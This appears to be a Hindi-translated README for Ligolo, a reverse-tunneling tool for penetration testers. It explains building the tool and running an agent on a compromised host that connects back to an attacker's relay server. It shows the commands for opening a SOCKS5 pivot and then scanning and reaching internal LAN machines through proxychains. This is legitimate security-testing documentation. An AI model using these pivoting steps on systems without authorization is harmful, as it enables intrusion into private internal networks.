
पेंटेस्टर्स द्वारा पेंटेस्टर्स के लिए रिवर्स टनलिंग को आसान बनाया गया https://sysdream.com/

Ligolo एक सरल और हल्का उपकरण है जो रिवर्स कनेक्शन से SOCKS5 या TCP टनल स्थापित करने के लिए है, पूर्ण सुरक्षा में (TLS प्रमाणपत्र जो दीर्घवृत्तीय वक्र के साथ है)।
यह Meterpreter के Autoroute + Socks4a के समान है, लेकिन अधिक स्थिर और तेज़ है।
आपने अपने बाहरी ऑडिट के दौरान किसी Windows / Linux / Mac सर्वर से समझौता किया। यह सर्वर LAN नेटवर्क के अंदर स्थित है और आप इस नेटवर्क पर अन्य मशीनों से कनेक्शन स्थापित करना चाहते हैं।
Ligolo आंतरिक सर्वर के संसाधनों तक पहुँचने के लिए एक टनल स्थापित कर सकता है।
Proxychains का उपयोग करके RDP कनेक्शन का रिले (WAN)।

यहाँ दो 100mb/s होस्ट (ligolo / localrelay) के बीच स्पीडटेस्ट का एक स्क्रीनशॉट है। प्रदर्शन सिस्टम और नेटवर्क कॉन्फ़िगरेशन के आधार पर भिन्न हो सकता है।

सुनिश्चित करें कि Go स्थापित और काम कर रहा है।
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
make certs TLS_HOST=example.com
नोट: आप build को कॉल करते समय TLS_CERT make विकल्प का उपयोग करके अपने स्वयं के प्रमाणपत्रों का भी उपयोग कर सकते हैं। उदाहरण: make build-all TLS_CERT=certs/mycert.pem।
make build-all
make build
Ligolo में दो मॉड्यूल शामिल हैं:
Localrelay को नियंत्रण सर्वर (हमलावर सर्वर) पर चलाने का इरादा है।
Ligolo वह प्रोग्राम है जिसे लक्ष्य कंप्यूटर पर चलाना है।
Localrelay के लिए, आप डिफ़ॉल्ट विकल्प छोड़ सकते हैं। यह पोर्ट 5555 पर सभी इंटरफेस पर सुनता है और ligolo (-relayserver पैरामीटर) से कनेक्शन की प्रतीक्षा करता है।
Ligolo के लिए, आपको -relayserver ip:port पैरामीटर का उपयोग करके रिले सर्वर (या आपके हमले के सर्वर) का IP पता निर्दिष्ट करना होगा।
आप सहायता के लिए -h विकल्प का उपयोग कर सकते हैं।
एक बार Ligolo और LocalRelay के बीच कनेक्शन स्थापित हो जाने के बाद, रिले सर्वर पर TCP पोर्ट 1080 पर एक SOCKS5 प्रॉक्सी स्थापित की जाएगी (आप -localserver विकल्प का उपयोग करके TCP पता/पोर्ट बदल सकते हैं)।
उसके बाद, आपको बस अपने पसंदीदा टूल (उदाहरण के लिए Proxychains) का उपयोग करना है, और क्लाइंट के LAN नेटवर्क का अन्वेषण करना है।
अपने हमले के सर्वर पर।
./bin/localrelay_linux_amd64
समझौता किए गए होस्ट पर।
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
एक बार कनेक्शन स्थापित हो जाने के बाद, ProxyChains कॉन्फ़िग फ़ाइल (हमले के सर्वर पर) में निम्नलिखित पैरामीटर सेट करें:
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
लाभ उठाएँ।
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123
Localrelay विकल्प:
Usage of localrelay:
-certfile string
The TLS server certificate (default "certs/server.crt")
-keyfile string
The TLS server key (default "certs/server.key")
-localserver string
The local server address (your proxychains parameter) (default "127.0.0.1:1080")
-relayserver string
The relay server listening address (the connect-back address) (default "0.0.0.0:5555")
Ligolo विकल्प:
Usage of ligolo:
-autorestart
Attempt to reconnect in case of an exception
-relayserver string
The relay server (the connect-back address) (default "127.0.0.1:5555")
-skipverify
Skip TLS certificate pinning verification
-targetserver string
The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server
GNU जनरल पब्लिक लाइसेंस v3.0 (देखें LICENSING)।